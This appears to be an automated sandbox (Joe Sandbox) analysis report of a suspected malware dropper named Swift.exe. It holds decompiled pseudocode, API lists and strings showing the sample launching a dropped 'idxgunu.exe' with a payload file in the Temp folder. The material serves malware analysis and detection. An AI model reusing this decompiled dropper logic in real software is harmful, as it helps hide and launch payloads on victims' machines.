0x004043b4
0x004043bb
0x004043c5
0x004043cd
0x004043da
0x004043ee
0x004043f2
0x004043f2
0x004043ee
0x004043f7
0x00404404
0x00404404
0x004043b1
0x00000000
0x00404369
0x00404357
0x00000000
0x00000000
0x0040435d
0x00000000
0x004042c8
0x004042d5
0x004042de
0x004042eb
0x004042eb
0x004042f2
0x004042f8
0x00404301
0x00404304
0x00404307
0x0040430f
0x00404312
0x00404315
0x0040431b
0x00404322
0x00404329
0x004045bb
0x004045cd
0x0040432f
0x00404332
0x00000000
0x00404332
0x00404329

APIs

GetDlgItem.USER32 ref: 004042CE
SetWindowTextA.USER32(00000000,?), ref: 004042F8
SHBrowseForFolderA.SHELL32(?,0079E160,?), ref: 004043A9
CoTaskMemFree.OLE32(00000000), ref: 004043B4
lstrcmpiA.KERNEL32("C:\Users\user\AppData\Local\Temp\idxgunu.exe" C:\Users\user\AppData\Local\Temp\jdgedcev.bx,0079ED90,00000000,?,?), ref: 004043E6
lstrcatA.KERNEL32(?,"C:\Users\user\AppData\Local\Temp\idxgunu.exe" C:\Users\user\AppData\Local\Temp\jdgedcev.bx), ref: 004043F2
SetDlgItemTextA.USER32 ref: 00404404

Part of subcall function 0040542A: GetDlgItemTextA.USER32 ref: 0040543D

Part of subcall function 00405DE7: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Swift.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030CC,C:\Users\user\AppData\Local\Temp\,00000000,0040327D), ref: 00405E3F
Part of subcall function 00405DE7: CharNextA.USER32(?,?,?,00000000), ref: 00405E4C
Part of subcall function 00405DE7: CharNextA.USER32(?,"C:\Users\user\Desktop\Swift.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030CC,C:\Users\user\AppData\Local\Temp\,00000000,0040327D), ref: 00405E51
Part of subcall function 00405DE7: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030CC,C:\Users\user\AppData\Local\Temp\,00000000,0040327D), ref: 00405E61

GetDiskFreeSpaceA.KERNEL32(0079DD58,?,?,0000040F,?,0079DD58,0079DD58,?,00000001,0079DD58,?,?,000003FB,?), ref: 004044C2
MulDiv.KERNEL32(?,0000040F,00000400), ref: 004044DD

Part of subcall function 00404636: lstrlenA.KERNEL32(0079ED90,0079ED90,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404551,000000DF,00000000,00000400,?), ref: 004046D4
Part of subcall function 00404636: wsprintfA.USER32 ref: 004046DC
Part of subcall function 00404636: SetDlgItemTextA.USER32 ref: 004046EF

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 004043CF
"C:\Users\user\AppData\Local\Temp\idxgunu.exe" C:\Users\user\AppData\Local\Temp\jdgedcev.bx, xrefs: 004043E0, 004043E5, 004043F0
A, xrefs: 004043A2

Memory Dump Source

Source File: 00000000.00000002.310942618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.310937128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310950485.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310959555.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310965741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311346623.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311356375.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311364853.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311370999.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311440575.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311449919.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311494423.00000000007AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Swift.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\AppData\Local\Temp\idxgunu.exe" C:\Users\user\AppData\Local\Temp\jdgedcev.bx$A$C:\Users\user\AppData\Local\Temp
API String ID: 2624150263-1568411840
Opcode ID: 6973a76a209e09fe73b08a99727a243513d067e22c67c94ff9f915c2a37189b4
Instruction ID: e799a447bd99e62007f9b2805c294ef52fff598fdfa2ff520e47df87d4bb9d78
Opcode Fuzzy Hash: 6973a76a209e09fe73b08a99727a243513d067e22c67c94ff9f915c2a37189b4
Instruction Fuzzy Hash: C2A170B1900609ABDB11EFA6DC45AAF77B8EF84315F10803BF601B62D1D77C9A418F69

Uniqueness

Uniqueness Score: -1.00%

Function 00402036 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134
comCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00402036() {
				void* _t44;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr* _t54;
				signed int _t58;
				intOrPtr* _t59;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t71;
				int _t75;
				signed int _t81;
				intOrPtr* _t88;
				void* _t95;
				void* _t96;
				void* _t100;

				 *(_t100 - 0x30) = E00402A0C(0xfffffff0);
				_t96 = E00402A0C(0xffffffdf);
				 *((intOrPtr*)(_t100 - 0x34)) = E00402A0C(2);
				 *((intOrPtr*)(_t100 - 0xc)) = E00402A0C(0xffffffcd);
				 *((intOrPtr*)(_t100 - 0x38)) = E00402A0C(0x45);
				if(E004056E5(_t96) == 0) {
					E00402A0C(0x21);
				}
				_t44 = _t100 + 8;
				__imp__CoCreateInstance(0x4073ac, _t75, 1, 0x40739c, _t44);
				if(_t44 < _t75) {
					L13:
					 *((intOrPtr*)(_t100 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t48 =  *((intOrPtr*)(_t100 + 8));
					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x4073bc, _t100 - 8);
					if(_t95 >= _t75) {
						_t52 =  *((intOrPtr*)(_t100 + 8));
						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
						_t54 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\jones\\AppData\\Local\\Temp");
						_t81 =  *(_t100 - 0x18);
						_t58 = _t81 >> 0x00000008 & 0x000000ff;
						if(_t58 != 0) {
							_t88 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
							_t81 =  *(_t100 - 0x18);
						}
						_t59 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 0xc)))) != _t75) {
							_t71 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 0xc)),  *(_t100 - 0x18) & 0x000000ff);
						}
						_t62 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x34)));
						_t64 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x38)));
						if(_t95 >= _t75) {
							_t95 = 0x80004005;
							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409428, 0x400) != 0) {
								_t69 =  *((intOrPtr*)(_t100 - 8));
								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409428, 1);
							}
						}
						_t66 =  *((intOrPtr*)(_t100 - 8));
						 *((intOrPtr*)( *_t66 + 8))(_t66);
					}
					_t50 =  *((intOrPtr*)(_t100 + 8));
					 *((intOrPtr*)( *_t50 + 8))(_t50);
					if(_t95 >= _t75) {
						_push(0xfffffff4);
					} else {
						goto L13;
					}
				}
				E00401423();
				 *0x7a2808 =  *0x7a2808 +  *((intOrPtr*)(_t100 - 4));
				return 0;
			}

0x0040203f
0x00402049
0x00402052
0x0040205c
0x00402065
0x0040206f
0x00402073
0x00402073
0x00402078
0x00402089
0x00402091
0x00402171
0x00402171
0x00402178
0x00402097
0x00402097
0x004020a8
0x004020ac
0x004020b2
0x004020bc
0x004020be
0x004020c9
0x004020cc
0x004020d9
0x004020db
0x004020dd
0x004020e4
0x004020e7
0x004020e7
0x004020ea
0x004020f4
0x004020fc
0x00402101
0x0040210d
0x0040210d
0x00402110
0x00402119
0x0040211c
0x00402125
0x0040212a
0x0040213c
0x0040214b
0x0040214d
0x00402159
0x00402159
0x0040214b
0x0040215b
0x00402161
0x00402161
0x00402164
0x0040216a
0x0040216f
0x00402184
0x00000000
0x00000000
0x00000000
0x0040216f
0x0040217a
0x004028a4
0x004028b0

APIs

CoCreateInstance.OLE32(004073AC,?,00000001,0040739C,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402089
MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409428,00000400,?,00000001,0040739C,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402143

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 004020C1

Memory Dump Source

Source File: 00000000.00000002.310942618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.310937128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310950485.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310959555.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310965741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311346623.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311356375.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311364853.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311370999.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311440575.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311449919.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311494423.00000000007AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Swift.jbxd

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 123533781-47812868
Opcode ID: 61edfcc500af9c4f4ad5dc63c36db71de46d1c57f6be090dd74687c511904802
Instruction ID: f4722f502a988deea6efd167e6cfee78577530b6538537a172f5ac5809527e26
Opcode Fuzzy Hash: 61edfcc500af9c4f4ad5dc63c36db71de46d1c57f6be090dd74687c511904802
Instruction Fuzzy Hash: F9416275A00204BFDB00DFA4CD89E9E7BB6EF49314B20426AF915EB2D1CA79DD41CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00402654 Relevance: 1.5, APIs: 1, Instructions: 29
fileCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E00402654(char __ebx, CHAR* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E00402A0C(2), _t19 - 0x19c) != 0xffffffff) {
					E00405AE3(__edi, _t6);
					_push(_t19 - 0x170);
					_push(__esi);
					E00405B85();
				} else {
					 *((char*)(__edi)) = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x7a2808 =  *0x7a2808 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}

0x0040266c
0x00402680
0x0040268b
0x0040268c
0x004027c7
0x0040266e
0x0040266e
0x00402670
0x00402672
0x00402672
0x004028a4
0x004028b0

APIs

FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402663

Memory Dump Source

Source File: 00000000.00000002.310942618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.310937128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310950485.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310959555.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310965741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311346623.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311356375.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311364853.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311370999.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311440575.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311449919.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311494423.00000000007AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Swift.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 7ca6b9b5d2c7fd5aae5b36faa0540b4d9b89d563ae51df7f16cde8b6a21b2482
Instruction ID: 98c64edcb31ee33cf81e9a0ba63f9fe8e3531dd16b377947a66dcc62953527f0
Opcode Fuzzy Hash: 7ca6b9b5d2c7fd5aae5b36faa0540b4d9b89d563ae51df7f16cde8b6a21b2482
Instruction Fuzzy Hash: A8F0E532508100EED710E7B89D89AFEB3B8EF51324F20467BE505F20C1CABC5945DB2A

Uniqueness

Uniqueness Score: -1.00%

Function 0040396E Relevance: 48.3, APIs: 32, Instructions: 345
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0040396E(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				struct HWND__* _t49;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t115;
				signed int _t116;
				int _t117;
				signed int _t122;
				struct HWND__* _t125;
				struct HWND__* _t126;
				int _t127;
				long _t130;
				int _t132;
				int _t133;
				void* _t134;
				void* _t142;

				_t115 = _a8;
				if(_t115 == 0x110 || _t115 == 0x408) {
					_t35 = _a12;
					_t125 = _a4;
					__eflags = _t115 - 0x110;
					 *0x79ed74 = _t35;
					if(_t115 == 0x110) {
						 *0x7a2788 = _t125;
						 *0x79ed88 = GetDlgItem(_t125, 1);
						_t91 = GetDlgItem(_t125, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x79dd50 = _t91;
						E00403E41(_t125);
						SetClassLongA(_t125, 0xfffffff2,  *0x7a1f68);
						 *0x7a1f4c = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x79ed74 = 1;
					}
					_t122 =  *0x4091cc; // 0xffffffff
					_t133 = 0;
					_t130 = (_t122 << 6) +  *0x7a27a0;
					__eflags = _t122;
					if(_t122 < 0) {
						L34:
						E00403E8D(0x40b);
						while(1) {
							_t37 =  *0x79ed74;
							 *0x4091cc =  *0x4091cc + _t37;
							_t130 = _t130 + (_t37 << 6);
							_t39 =  *0x4091cc; // 0xffffffff
							__eflags = _t39 -  *0x7a27a4;
							if(_t39 ==  *0x7a27a4) {
								E0040140B(1);
							}
							__eflags =  *0x7a1f4c - _t133; // 0x0
							if(__eflags != 0) {
								break;
							}
							__eflags =  *0x4091cc -  *0x7a27a4; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t116 =  *(_t130 + 0x14);
							E00405BA7(_t116, _t125, _t130, 0x7aa800,  *((intOrPtr*)(_t130 + 0x24)));
							_push( *((intOrPtr*)(_t130 + 0x20)));
							_push(0xfffffc19);
							E00403E41(_t125);
							_push( *((intOrPtr*)(_t130 + 0x1c)));
							_push(0xfffffc1b);
							E00403E41(_t125);
							_push( *((intOrPtr*)(_t130 + 0x28)));
							_push(0xfffffc1a);
							E00403E41(_t125);
							_t49 = GetDlgItem(_t125, 3);
							__eflags =  *0x7a280c - _t133;
							_v32 = _t49;
							if( *0x7a280c != _t133) {
								_t116 = _t116 & 0x0000fefd | 0x00000004;
								__eflags = _t116;
							}
							ShowWindow(_t49, _t116 & 0x00000008);
							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
							E00403E63(_t116 & 0x00000002);
							_t117 = _t116 & 0x00000004;
							EnableWindow( *0x79dd50, _t117);
							__eflags = _t117 - _t133;
							if(_t117 == _t133) {
								_push(1);
							} else {
								_push(_t133);
							}
							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
							__eflags =  *0x7a280c - _t133;
							if( *0x7a280c == _t133) {
								_push( *0x79ed88);
							} else {
								SendMessageA(_t125, 0x401, 2, _t133);
								_push( *0x79dd50);
							}
							E00403E76();
							E00405B85(0x79ed90, 0x7a1f80);
							E00405BA7(0x79ed90, _t125, _t130,  &(0x79ed90[lstrlenA(0x79ed90)]),  *((intOrPtr*)(_t130 + 0x18)));
							SetWindowTextA(_t125, 0x79ed90);
							_push(_t133);
							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t130 - _t133;
								if( *_t130 == _t133) {
									continue;
								}
								__eflags =  *(_t130 + 4) - 5;
								if( *(_t130 + 4) != 5) {
									DestroyWindow( *0x7a1f58);
									 *0x79e560 = _t130;
									__eflags =  *_t130 - _t133;
									if( *_t130 <= _t133) {
										goto L58;
									}
									_t73 = CreateDialogParamA( *0x7a2780,  *_t130 +  *0x7a1f60 & 0x0000ffff, _t125,  *(0x4091d0 +  *(_t130 + 4) * 4), _t130);
									__eflags = _t73 - _t133;
									 *0x7a1f58 = _t73;
									if(_t73 == _t133) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t130 + 0x2c)));
									_push(6);
									E00403E41(_t73);
									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
									ScreenToClient(_t125, _t134 + 0x10);
									SetWindowPos( *0x7a1f58, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
									_push(_t133);
									E00401389( *((intOrPtr*)(_t130 + 0xc)));
									__eflags =  *0x7a1f4c - _t133; // 0x0
									if(__eflags != 0) {
										goto L61;
									}
									ShowWindow( *0x7a1f58, 8);
									E00403E8D(0x405);
									goto L58;
								}
								__eflags =  *0x7a280c - _t133;
								if( *0x7a280c != _t133) {
									goto L61;
								}
								__eflags =  *0x7a2800 - _t133;
								if( *0x7a2800 != _t133) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x7a1f58);
						 *0x7a2788 = _t133;
						EndDialog(_t125,  *0x79e158);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t130 - _t133;
							if( *_t130 == _t133) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L33;
						}
						SendMessageA( *0x7a1f58, 0x40f, 0, 1);
						__eflags =  *0x7a1f4c - _t133; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t125 = _a4;
					_t133 = 0;
					if(_t115 == 0x47) {
						SetWindowPos( *0x79ed68, _t125, 0, 0, 0, 0, 0x13);
					}
					if(_t115 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x79ed68,  ~(_a12 - 1) & _t115);
					}
					if(_t115 != 0x40d) {
						__eflags = _t115 - 0x11;
						if(_t115 != 0x11) {
							__eflags = _t115 - 0x111;
							if(_t115 != 0x111) {
								L26:
								return E00403EA8(_t115, _a12, _a16);
							}
							_t132 = _a12 & 0x0000ffff;
							_t126 = GetDlgItem(_t125, _t132);
							__eflags = _t126 - _t133;
							if(_t126 == _t133) {
								L13:
								__eflags = _t132 - 1;
								if(_t132 != 1) {
									__eflags = _t132 - 3;
									if(_t132 != 3) {
										_t127 = 2;
										__eflags = _t132 - _t127;
										if(_t132 != _t127) {
											L25:
											SendMessageA( *0x7a1f58, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x7a280c - _t133;
										if( *0x7a280c == _t133) {
											_t99 = E0040140B(3);
											__eflags = _t99;
											if(_t99 != 0) {
												goto L26;
											}
											 *0x79e158 = 1;
											L21:
											_push(0x78);
											L22:
											E00403E1A();
											goto L26;
										}
										E0040140B(_t127);
										 *0x79e158 = _t127;
										goto L21;
									}
									__eflags =  *0x4091cc - _t133; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t132);
								goto L22;
							}
							SendMessageA(_t126, 0xf3, _t133, _t133);
							_t103 = IsWindowEnabled(_t126);
							__eflags = _t103;
							if(_t103 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t125, _t133, _t133);
						return 1;
					} else {
						DestroyWindow( *0x7a1f58);
						 *0x7a1f58 = _a12;
						L58:
						if( *0x79fd90 == _t133) {
							_t142 =  *0x7a1f58 - _t133; // 0x0
							if(_t142 != 0) {
								ShowWindow(_t125, 0xa);
								 *0x79fd90 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}

0x00403977
0x00403980
0x00403ac1
0x00403ac5
0x00403ac9
0x00403acb
0x00403ad0
0x00403adb
0x00403ae6
0x00403aeb
0x00403aed
0x00403aef
0x00403af2
0x00403af7
0x00403b05
0x00403b12
0x00403b19
0x00403b19
0x00403b1a
0x00403b1a
0x00403b1f
0x00403b25
0x00403b2c
0x00403b32
0x00403b34
0x00403b74
0x00403b79
0x00403b7e
0x00403b7e
0x00403b83
0x00403b8c
0x00403b8e
0x00403b93
0x00403b99
0x00403b9d
0x00403b9d
0x00403ba2
0x00403ba8
0x00000000
0x00000000
0x00403bb3
0x00403bb9
0x00000000
0x00000000
0x00403bc2
0x00403bca
0x00403bcf
0x00403bd2
0x00403bd8
0x00403bdd
0x00403be0
0x00403be6
0x00403beb
0x00403bee
0x00403bf4
0x00403bfc
0x00403c02
0x00403c08
0x00403c0c
0x00403c13
0x00403c13
0x00403c13
0x00403c1d
0x00403c2f
0x00403c3b
0x00403c40
0x00403c4a
0x00403c50
0x00403c52
0x00403c57
0x00403c54
0x00403c54
0x00403c54
0x00403c67
0x00403c7f
0x00403c81
0x00403c87
0x00403c9c
0x00403c89
0x00403c92
0x00403c94
0x00403c94
0x00403ca2
0x00403cb2
0x00403cc3
0x00403cca
0x00403cd0
0x00403cd4
0x00403cd9
0x00403cdb
0x00000000
0x00403ce1
0x00403ce1
0x00403ce3
0x00000000
0x00000000
0x00403ce9
0x00403ced
0x00403d12
0x00403d18
0x00403d1e
0x00403d20
0x00000000
0x00000000
0x00403d46
0x00403d4c
0x00403d4e
0x00403d53
0x00000000
0x00000000
0x00403d59
0x00403d5c
0x00403d5f
0x00403d76
0x00403d82
0x00403d9b
0x00403da1
0x00403da5
0x00403daa
0x00403db0
0x00000000
0x00000000
0x00403dba
0x00403dc5
0x00000000
0x00403dc5
0x00403cef
0x00403cf5
0x00000000
0x00000000
0x00403cfb
0x00403d01
0x00000000
0x00000000
0x00000000
0x00403d07
0x00403cdb
0x00403dd2
0x00403dde
0x00403de5
0x00000000
0x00403b36
0x00403b36
0x00403b39
0x00403b6c
0x00403b6c
0x00403b6e
0x00000000
0x00000000
0x00000000
0x00403b6e
0x00403b3b
0x00403b3f
0x00403b44
0x00403b46
0x00000000
0x00000000
0x00403b56
0x00403b5e
0x00000000
0x00403b64
0x00403992
0x00403992
0x00403996
0x0040399b
0x004039aa
0x004039aa
0x004039b3
0x004039bc
0x004039c7
0x004039c7
0x004039d3
0x004039ef
0x004039f2
0x00403a05
0x00403a0b
0x00403aae
0x00000000
0x00403ab7
0x00403a11
0x00403a1e
0x00403a20
0x00403a22
0x00403a41
0x00403a41
0x00403a44
0x00403a49
0x00403a4c
0x00403a5c
0x00403a5d
0x00403a5f
0x00403a95
0x00403aa8
0x00000000
0x00403aa8
0x00403a61
0x00403a67
0x00403a80
0x00403a85
0x00403a87
0x00000000
0x00000000
0x00403a89
0x00403a75
0x00403a75
0x00403a77
0x00403a77
0x00000000
0x00403a77
0x00403a6a
0x00403a6f
0x00000000
0x00403a6f
0x00403a4e
0x00403a54
0x00000000
0x00000000
0x00403a56
0x00000000
0x00403a56
0x00403a46
0x00000000
0x00403a46
0x00403a2c
0x00403a33
0x00403a39
0x00403a3b
0x00000000
0x00000000
0x00000000
0x00403a3b
0x004039f7
0x00000000
0x004039d5
0x004039db
0x004039e5
0x00403deb
0x00403df1
0x00403df3
0x00403df9
0x00403dfe
0x00403e04
0x00403e04
0x00403df9
0x00403e0e
0x00000000
0x00403e0e
0x004039d3

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039AA
ShowWindow.USER32(?), ref: 004039C7
DestroyWindow.USER32 ref: 004039DB
SetWindowLongA.USER32 ref: 004039F7
GetDlgItem.USER32 ref: 00403A18
SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403A2C
IsWindowEnabled.USER32(00000000), ref: 00403A33
GetDlgItem.USER32 ref: 00403AE1
GetDlgItem.USER32 ref: 00403AEB
SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403B05
SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403B56
GetDlgItem.USER32 ref: 00403BFC
ShowWindow.USER32(00000000,?), ref: 00403C1D
EnableWindow.USER32(?,?), ref: 00403C2F
EnableWindow.USER32(?,?), ref: 00403C4A
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403C60
EnableMenuItem.USER32 ref: 00403C67
SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403C7F
SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403C92
lstrlenA.KERNEL32(0079ED90,?,0079ED90,007A1F80), ref: 00403CBB
SetWindowTextA.USER32(?,0079ED90), ref: 00403CCA
ShowWindow.USER32(?,0000000A), ref: 00403DFE

Memory Dump Source

Source File: 00000000.00000002.310942618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.310937128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310950485.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310959555.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310965741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311346623.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311356375.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311364853.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311370999.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311440575.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311449919.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311494423.00000000007AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Swift.jbxd

Similarity

API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
String ID:
API String ID: 184305955-0
Opcode ID: a92d5a74efde307e27fc71ed304f44015c89cd021bac2db6b1a0d29fb2f6ac3d
Instruction ID: e81899ad72949f91caee7c601f988e6e46f3702ef24a8888ce53fc841af4ed50
Opcode Fuzzy Hash: a92d5a74efde307e27fc71ed304f44015c89cd021bac2db6b1a0d29fb2f6ac3d
Instruction Fuzzy Hash: BAC19F71A04204AFDB216F61ED85D2B3EACEB85706F00453FF541B52E1C73DA9829B5E

Uniqueness

Uniqueness Score: -1.00%

Function 00403F89 Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 204
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00403F89(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char* _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t107;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x79ed70 =  *0x79ed70 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00403EA8(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
